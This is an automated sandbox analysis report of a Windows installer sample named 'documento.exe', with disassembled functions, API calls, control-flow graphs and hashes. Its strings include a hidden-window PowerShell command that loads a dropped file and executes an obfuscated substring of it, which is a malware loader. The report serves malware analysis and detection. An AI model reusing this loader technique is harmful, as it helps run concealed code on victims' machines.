                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                • Instruction ID: d1357e632777a99f3a46a744368fc942f06971bdd1fac7e5a473789d9e822290
                                                • Opcode Fuzzy Hash: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                • Instruction Fuzzy Hash: 22D012319481206BC3105B78AC0C85B7E98AF5A3303618A72F226F12F4D7349C6286AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                • Instruction ID: e04ffd14ad056a7bc966bca46badc1a9d7fcc05075aa2412e3ac1a9cf71dfd33
                                                • Opcode Fuzzy Hash: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                • Instruction Fuzzy Hash: 6BF0A772508100AFE701EBB499499EE7778DB61314F60457BE241E21C1D7B849859B3A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403A0F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 181 403a0f-403a21 182 403b62-403b71 181->182 183 403a27-403a2d 181->183 185 403bc0-403bd5 182->185 186 403b73-403bbb GetDlgItem * 2 call 403ee2 SetClassLongA call 40140b 182->186 183->182 184 403a33-403a3c 183->184 187 403a51-403a54 184->187 188 403a3e-403a4b SetWindowPos 184->188 190 403c15-403c1a call 403f2e 185->190 191 403bd7-403bda 185->191 186->185 193 403a56-403a68 ShowWindow 187->193 194 403a6e-403a74 187->194 188->187 198 403c1f-403c3a 190->198 196 403bdc-403be7 call 401389 191->196 197 403c0d-403c0f 191->197 193->194 199 403a90-403a93 194->199 200 403a76-403a8b DestroyWindow 194->200 196->197 218 403be9-403c08 SendMessageA 196->218 197->190 203 403eaf 197->203 204 403c43-403c49 198->204 205 403c3c-403c3e call 40140b 198->205 209 403a95-403aa1 SetWindowLongA 199->209 210 403aa6-403aac 199->210 207 403e8c-403e92 200->207 206 403eb1-403eb8 203->206 214 403e6d-403e86 DestroyWindow EndDialog 204->214 215 403c4f-403c5a 204->215 205->204 207->203 212 403e94-403e9a 207->212 209->206 216 403ab2-403ac3 GetDlgItem 210->216 217 403b4f-403b5d call 403f49 210->217 212->203 220 403e9c-403ea5 ShowWindow 212->220 214->207 215->214 221 403c60-403cad call 405d1f call 403ee2 * 3 GetDlgItem 215->221 222 403ae2-403ae5 216->222 223 403ac5-403adc SendMessageA IsWindowEnabled 216->223 217->206 218->206 220->203 251 403cb7-403cf3 ShowWindow KiUserCallbackDispatcher call 403f04 EnableWindow 221->251 252 403caf-403cb4 221->252 226 403ae7-403ae8 222->226 227 403aea-403aed 222->227 223->203 223->222 229 403b18-403b1d call 403ebb 226->229 230 403afb-403b00 227->230 231 403aef-403af5 227->231 229->217 232 403b36-403b49 SendMessageA 230->232 234 403b02-403b08 230->234 231->232 233 403af7-403af9 231->233 232->217 233->229 237 403b0a-403b10 call 40140b 234->237 238 403b1f-403b28 call 40140b 234->238 247 403b16 237->247 238->217 248 403b2a-403b34 238->248 247->229 248->247 255 403cf5-403cf6 251->255 256 403cf8 251->256 252->251 257 403cfa-403d28 GetSystemMenu EnableMenuItem SendMessageA 255->257 256->257 258 403d2a-403d3b SendMessageA 257->258 259 403d3d 257->259 260 403d43-403d7c call 403f17 call 405cfd lstrlenA call 405d1f SetWindowTextA call 401389 258->260 259->260 260->198 269 403d82-403d84 260->269 269->198 270 403d8a-403d8e 269->270 271 403d90-403d96 270->271 272 403dad-403dc1 DestroyWindow 270->272 271->203 273 403d9c-403da2 271->273 272->207 274 403dc7-403df4 CreateDialogParamA 272->274 273->198 275 403da8 273->275 274->207 276 403dfa-403e51 call 403ee2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 274->276 275->203 276->203 281 403e53-403e66 ShowWindow call 403f2e 276->281 283 403e6b 281->283 283->207
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                • ShowWindow.USER32(?), ref: 00403A68
                                                • DestroyWindow.USER32 ref: 00403A7C
                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                • SendMessageA.USER32 ref: 00403ACD
                                                • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                • GetDlgItem.USER32(?,00000001), ref: 00403B82
                                                • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                • SendMessageA.USER32 ref: 00403BF7
                                                • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CD0
                                                • EnableWindow.USER32(?,?), ref: 00403CEB
                                                • GetSystemMenu.USER32 ref: 00403D01
                                                • EnableMenuItem.USER32 ref: 00403D08
                                                • SendMessageA.USER32 ref: 00403D20
                                                • SendMessageA.USER32 ref: 00403D33
                                                • lstrlenA.KERNEL32(Fortrstningsfuldere7 Setup: Completed,?,Fortrstningsfuldere7 Setup: Completed,00422F20), ref: 00403D5C
                                                • SetWindowTextA.USER32(?,Fortrstningsfuldere7 Setup: Completed), ref: 00403D6B
                                                • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: Fortrstningsfuldere7 Setup: Completed
                                                • API String ID: 3282139019-854558490
                                                • Opcode ID: e65e75c514bf03efa5ce6d2994b341edb8337756b2853bfd874a528499e69a5c
                                                • Instruction ID: 59f0c632d138382d557344a1f3b7ccf8545d810693bdce96ba14c4126dbc1e18
                                                • Opcode Fuzzy Hash: e65e75c514bf03efa5ce6d2994b341edb8337756b2853bfd874a528499e69a5c
                                                • Instruction Fuzzy Hash: 24C1E171A04205BBDB21AF21ED84E2B3E7CFB44706B50453EF611B11E1C779A942AB6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040367D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 284 40367d-403695 call 406092 287 403697-4036a7 call 405c5b 284->287 288 4036a9-4036da call 405be4 284->288 296 4036fd-403726 call 403942 call 40585d 287->296 292 4036f2-4036f8 lstrcatA 288->292 293 4036dc-4036ed call 405be4 288->293 292->296 293->292 302 40372c-403731 296->302 303 4037ad-4037b5 call 40585d 296->303 302->303 304 403733-40374b call 405be4 302->304 308 4037c3-4037e8 LoadImageA 303->308 309 4037b7-4037be call 405d1f 303->309 310 403750-403757 304->310 312 403869-403871 call 40140b 308->312 313 4037ea-40381a RegisterClassA 308->313 309->308 310->303 314 403759-40375b 310->314 327 403873-403876 312->327 328 40387b-403886 call 403942 312->328 317 403820-403864 SystemParametersInfoA CreateWindowExA 313->317 318 403938 313->318 315 40376c-403778 lstrlenA 314->315 316 40375d-40376a call 40579a 314->316 322 4037a0-4037a8 call 40576f call 405cfd 315->322 323 40377a-403788 lstrcmpiA 315->323 316->315 317->312 321 40393a-403941 318->321 322->303 323->322 326 40378a-403794 GetFileAttributesA 323->326 330 403796-403798 326->330 331 40379a-40379b call 4057b6 326->331 327->321 337 40388c-4038a6 ShowWindow call 406028 328->337 338 40390f-403910 call 404fe8 328->338 330->322 330->331 331->322 345 4038b2-4038c4 GetClassInfoA 337->345 346 4038a8-4038ad call 406028 337->346 341 403915-403917 338->341 343 403931-403933 call 40140b 341->343 344 403919-40391f 341->344 343->318 344->327 351 403925-40392c call 40140b 344->351 349 4038c6-4038d6 GetClassInfoA RegisterClassA 345->349 350 4038dc-4038ff DialogBoxParamA call 40140b 345->350 346->345 349->350 354 403904-40390d call 4035cd 350->354 351->327 354->321
                                                APIs
                                                  • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                  • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060BF
                                                • lstrcatA.KERNEL32(1033,Fortrstningsfuldere7 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fortrstningsfuldere7 Setup: Completed,00000000,00000002,75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documento.exe",00000000), ref: 004036F8
                                                • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Deinotherium,1033,Fortrstningsfuldere7 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fortrstningsfuldere7 Setup: Completed,00000000,00000002,75712754), ref: 0040376D
                                                • lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Deinotherium,1033,Fortrstningsfuldere7 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Fortrstningsfuldere7 Setup: Completed,00000000), ref: 00403780
                                                • GetFileAttributesA.KERNEL32(: Completed), ref: 0040378B
                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Deinotherium), ref: 004037D4
                                                  • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                • CreateWindowExA.USER32 ref: 0040385E
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                • DialogBoxParamA.USER32 ref: 004038F5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Deinotherium$Control Panel\Desktop\ResourceLocale$Fortrstningsfuldere7 Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 1975747703-1842564011
                                                • Opcode ID: e5e732fa2ac6b6f30794d687317306249c7fdf90a4e561a867839475ad421bc5
                                                • Instruction ID: 7b7c40b23c28382cce88422b139422c0b39d4688b8d1f116fbeb90bdc2aa80af
                                                • Opcode Fuzzy Hash: e5e732fa2ac6b6f30794d687317306249c7fdf90a4e561a867839475ad421bc5
                                                • Instruction Fuzzy Hash: E161C7B46442007ED620BF61AD45F273AACEB4474AF40847FF945B22E1C77CAD069A3E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402C66 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 358 402c66-402cb4 GetTickCount GetModuleFileNameA call 405970 361 402cc0-402cee call 405cfd call 4057b6 call 405cfd GetFileSize 358->361 362 402cb6-402cbb 358->362 370 402cf4 361->370 371 402ddb-402de9 call 402c02 361->371 363 402e98-402e9c 362->363 373 402cf9-402d10 370->373 377 402deb-402dee 371->377 378 402e3e-402e43 371->378 375 402d12 373->375 376 402d14-402d1d call 40307b 373->376 375->376 384 402d23-402d2a 376->384 385 402e45-402e4d call 402c02 376->385 380 402df0-402e08 call 403091 call 40307b 377->380 381 402e12-402e3c GlobalAlloc call 403091 call 402e9f 377->381 378->363 380->378 404 402e0a-402e10 380->404 381->378 409 402e4f-402e60 381->409 389 402da6-402daa 384->389 390 402d2c-402d40 call 40592b 384->390 385->378 394 402db4-402dba 389->394 395 402dac-402db3 call 402c02 389->395 390->394 407 402d42-402d49 390->407 400 402dc9-402dd3 394->400 401 402dbc-402dc6 call 406107 394->401 395->394 400->373 408 402dd9 400->408 401->400 404->378 404->381 407->394 413 402d4b-402d52 407->413 408->371 410 402e62 409->410 411 402e68-402e6d 409->411 410->411 414 402e6e-402e74 411->414 413->394 415 402d54-402d5b 413->415 414->414 417 402e76-402e91 SetFilePointer call 40592b 414->417 415->394 416 402d5d-402d64 415->416 416->394 418 402d66-402d86 416->418 421 402e96 417->421 418->378 420 402d8c-402d90 418->420 422 402d92-402d96 420->422 423 402d98-402da0 420->423 421->363 422->408 422->423 423->394 424 402da2-402da4 423->424 424->394
                                                APIs
                                                • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402C77
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\documento.exe,00000400), ref: 00402C93
                                                  • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\documento.exe,80000000,00000003), ref: 00405974
                                                  • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\documento.exe,C:\Users\user\Desktop\documento.exe,80000000,00000003), ref: 00402CDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\documento.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$hA
                                                • API String ID: 4283519449-1010622071
                                                • Opcode ID: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                • Instruction ID: 8c4c774c716df1ba4ed4283b0a2f2a309b4ff87d1887d614af3d34fab0b2b326
                                                • Opcode Fuzzy Hash: 152ac9b7a1b1dc19f9c0e8349d0464e237808c5fe7e9e051921f38e6572f43da
                                                • Instruction Fuzzy Hash: 5A51B3B1A41214ABDF209F65DE89B9E7AB8EF00355F10403BF904B62D1C7BC9D418BAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401751 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 487 401751-401774 call 402a3a call 4057dc 492 401776-40177c call 405cfd 487->492 493 40177e-401790 call 405cfd call 40576f lstrcatA 487->493 498 401795-40179b call 405f68 492->498 493->498 503 4017a0-4017a4 498->503 504 4017a6-4017b0 call 406001 503->504 505 4017d7-4017da 503->505 512 4017c2-4017d4 504->512 513 4017b2-4017c0 CompareFileTime 504->513 507 4017e2-4017fe call 405970 505->507 508 4017dc-4017dd call 40594b 505->508 515 401800-401803 507->515 516 401876-40189f call 404f16 call 402e9f 507->516 508->507 512->505 513->512 518 401805-401847 call 405cfd * 2 call 405d1f call 405cfd call 4054f3 515->518 519 401858-401862 call 404f16 515->519 529 4018a1-4018a5 516->529 530 4018a7-4018b3 SetFileTime 516->530 518->503 551 40184d-40184e 518->551 531 40186b-401871 519->531 529->530 534 4018b9-4018c4 CloseHandle 529->534 530->534 532 4028d8 531->532 538 4028da-4028de 532->538 536 4018ca-4018cd 534->536 537 4028cf-4028d2 534->537 540 4018e2-4018e5 call 405d1f 536->540 541 4018cf-4018e0 call 405d1f lstrcatA 536->541 537->532 547 4018ea-402273 call 4054f3 540->547 541->547 547->537 547->538 551->531 553 401850-401851 551->553 553->519
                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)",C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare,00000000,00000000,00000031), ref: 00401790
                                                • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)","powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)",00000000,00000000,"powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)",C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare,00000000,00000000,00000031), ref: 004017BA
                                                  • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                  • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                  • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FAA
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FC4
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: "powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"$C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\dompappens\gymnasiast.Lan
                                                • API String ID: 1941528284-1483896999
                                                • Opcode ID: 03728244cee0156ab1c106ee5509dce3fd72bfd5f56f8d1d22ca19b28631c824
                                                • Instruction ID: b3254d88aebf37d11d8c7362002191d58d549b74aa0b12ea023da1ca5ce0478c
                                                • Opcode Fuzzy Hash: 03728244cee0156ab1c106ee5509dce3fd72bfd5f56f8d1d22ca19b28631c824
                                                • Instruction Fuzzy Hash: 7F41C871A04515BADF107BB5CC45EAF3669DF41329F20823BF112F11E2DA3C4A419B6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404F16 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 554 404f16-404f2b 555 404fe1-404fe5 554->555 556 404f31-404f43 554->556 557 404f45-404f49 call 405d1f 556->557 558 404f4e-404f5a lstrlenA 556->558 557->558 560 404f77-404f7b 558->560 561 404f5c-404f6c lstrlenA 558->561 563 404f8a-404f8e 560->563 564 404f7d-404f84 SetWindowTextA 560->564 561->555 562 404f6e-404f72 lstrcatA 561->562 562->560 565 404f90-404fd2 SendMessageA * 3 563->565 566 404fd4-404fd6 563->566 564->563 565->566 566->555 567 404fd8-404fdb 566->567 567->555
                                                APIs
                                                • lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                • lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                • lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                • SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                • SendMessageA.USER32 ref: 00404FAA
                                                • SendMessageA.USER32 ref: 00404FC4
                                                • SendMessageA.USER32 ref: 00404FD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
